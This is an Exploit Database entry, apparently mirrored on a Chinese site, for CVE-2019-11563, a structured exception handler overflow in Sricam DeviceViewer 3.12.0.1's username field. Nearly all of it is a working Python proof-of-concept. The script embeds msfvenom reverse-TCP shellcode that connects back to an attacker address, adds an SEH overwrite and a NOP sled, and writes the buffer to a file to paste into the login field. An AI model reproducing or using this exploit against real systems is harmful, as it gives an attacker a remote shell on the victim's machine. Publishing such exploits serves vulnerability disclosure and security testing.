DeviceViewer 3.12.0.1 – ‘user’ SEH Overflow

• Exploit Database
• 15 阅读

• 作者： Hayden Wright
  日期： 2019-04-30
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46779/

• # Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow (PoC)
  # Discovery Date: 25/04/2019
  # Exploit Author: Hayden Wright
  # Vendor Homepage: www.sricam.com/
  # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
  # Version: v3.12.0.1
  # Tested on: Windows XP Pro x64, Windows 7 32bit
  # CVE : CVE-2019-11563
  
  #!/usr/bin/python
  import struct
  
  #------------------------------------------------------------#
  # CVE-2019-11563 #
  ##
  # Sricam DeviceViewer.exe 'username' field SEH overflow#
  # by Hayden Wright #
  ##
  # (*) badchars = '\x00\x0a\x0d'#
  # (*) SEH = 0x6a413969 OFFSET 268#
  # (*) nSEH = 268 -4#
  ##
  #69901d065EPOP ESI #
  #69901d075FPOP EDI #
  #69901d08C3RETN#
  ##
  #------------------------------------------------------------#
  
  #msfvenom -p windows/shell_reverse_tcp lport=1234 lhost=192.168.1.101 -f c -b '\x00\x0a\x0d' -a x86 --platform windows EXITFUNC=seh
  
  shellcode =(
  "\xb8\x51\x9c\x1c\xa4\xda\xc9\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
  "\x52\x31\x42\x12\x83\xea\xfc\x03\x13\x92\xfe\x51\x6f\x42\x7c"
  "\x99\x8f\x93\xe1\x13\x6a\xa2\x21\x47\xff\x95\x91\x03\xad\x19"
  "\x59\x41\x45\xa9\x2f\x4e\x6a\x1a\x85\xa8\x45\x9b\xb6\x89\xc4"
  "\x1f\xc5\xdd\x26\x21\x06\x10\x27\x66\x7b\xd9\x75\x3f\xf7\x4c"
  "\x69\x34\x4d\x4d\x02\x06\x43\xd5\xf7\xdf\x62\xf4\xa6\x54\x3d"
  "\xd6\x49\xb8\x35\x5f\x51\xdd\x70\x29\xea\x15\x0e\xa8\x3a\x64"
  "\xef\x07\x03\x48\x02\x59\x44\x6f\xfd\x2c\xbc\x93\x80\x36\x7b"
  "\xe9\x5e\xb2\x9f\x49\x14\x64\x7b\x6b\xf9\xf3\x08\x67\xb6\x70"
  "\x56\x64\x49\x54\xed\x90\xc2\x5b\x21\x11\x90\x7f\xe5\x79\x42"
  "\xe1\xbc\x27\x25\x1e\xde\x87\x9a\xba\x95\x2a\xce\xb6\xf4\x22"
  "\x23\xfb\x06\xb3\x2b\x8c\x75\x81\xf4\x26\x11\xa9\x7d\xe1\xe6"
  "\xce\x57\x55\x78\x31\x58\xa6\x51\xf6\x0c\xf6\xc9\xdf\x2c\x9d"
  "\x09\xdf\xf8\x32\x59\x4f\x53\xf3\x09\x2f\x03\x9b\x43\xa0\x7c"
  "\xbb\x6c\x6a\x15\x56\x97\xfd\xda\x0f\x96\x98\xb2\x4d\x98\x66"
  "\x91\xdb\x7e\x0c\x05\x8a\x29\xb9\xbc\x97\xa1\x58\x40\x02\xcc"
  "\x5b\xca\xa1\x31\x15\x3b\xcf\x21\xc2\xcb\x9a\x1b\x45\xd3\x30"
  "\x33\x09\x46\xdf\xc3\x44\x7b\x48\x94\x01\x4d\x81\x70\xbc\xf4"
  "\x3b\x66\x3d\x60\x03\x22\x9a\x51\x8a\xab\x6f\xed\xa8\xbb\xa9"
  "\xee\xf4\xef\x65\xb9\xa2\x59\xc0\x13\x05\x33\x9a\xc8\xcf\xd3"
  "\x5b\x23\xd0\xa5\x63\x6e\xa6\x49\xd5\xc7\xff\x76\xda\x8f\xf7"
  "\x0f\x06\x30\xf7\xda\x82\x4e\x09\xd6\x1e\xc6\xb0\x83\x62\x8a"
  "\x42\x7e\xa0\xb3\xc0\x8a\x59\x40\xd8\xff\x5c\x0c\x5e\xec\x2c"
  "\x1d\x0b\x12\x82\x1e\x1e")
  
  max_size = 4000
  
  buf = 'A'*264
  buf += '\xeb\x06\x90\x90'#jump short 6-bytes
  buf += struct.pack('<I', 0x69901d06) #POP ESI, POP EDI, RETavformat-54.dll
  buf += '\x90' * 16
  buf += shellcode
  buf += 'C'*(max_size - len(buf))
  
  print '[+] %s bytes buffer created...' %len(buf)
  
  try:
  filename = 'CVE-2019-11563.txt'
  file = open(filename , 'w')
  file.write(buf)
  print '[+] Evil buffer saved to file: ' + filename
  print '[+] Copy + paste its contents into the "user" field and hit login'
  file.close()
  except:
  print "[!] Could not create file!"